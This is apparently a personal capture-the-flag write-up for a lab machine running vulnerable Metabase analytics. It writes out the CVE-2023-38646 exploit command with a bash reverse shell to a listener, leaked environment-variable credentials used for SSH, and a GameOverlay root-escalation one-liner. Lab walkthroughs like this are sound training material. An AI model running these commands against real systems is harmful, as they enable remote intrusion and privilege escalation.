## Initial Access Vulnerable Metabase Analytics at http://data.analytical.htb CVE-2023-38646 https://github.com/m3m0o/metabase-pre-auth-rce-poc - Copy `setup-token:` from http://data.analytical.htb/api/session/properties ![[Pasted image 20250217221824.png]] Setup token: `249fa03d-fd94-4d5b-b94f-b4ebf3df681f` ```sh sudo nc -lnvp 4444 python exploit2.py --url http://data.analytical.htb --token 249fa03d-fd94-4d5b-b94f-b4ebf3df681f --command "bash -i >& /dev/tcp/10.10.14.11/4444 0>&1" ``` Did this part in about 30 minutes too. ## Privesc **Environment variables:** ```txt env META_USER=metalytics META_PASS=An4lytics_ds20223# ``` **Authenticating using SSH:** ```txt sshpass -p An4lytics_ds20223# ssh metalytics@$RHOST ``` I'll proceed to re-download the sliver agent abd re-enumerate. GameOverlay Privesc: ``` unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("/bin/bash")' ``` ## Lessons Learned - Spend too much time tunnel visioning database dumping - Then I spend time tunnel visioning on exotic docker breaks outs due to linpeas showing `/proc` in yellow/orange (supposedly 95% privesc vector) as well as asking ChatGPT for help and just kept hitting that rabbit hole as if it was crack cocaine. Very silly, need to get over my own imposter syndrome - if something dosen't start cracking after 30 minutes, it's not my skills which are lacking, but rather me going down the wrong path. - never occured to me to do "dumb shit" such as having a look at the environment variables which revealed a username and password...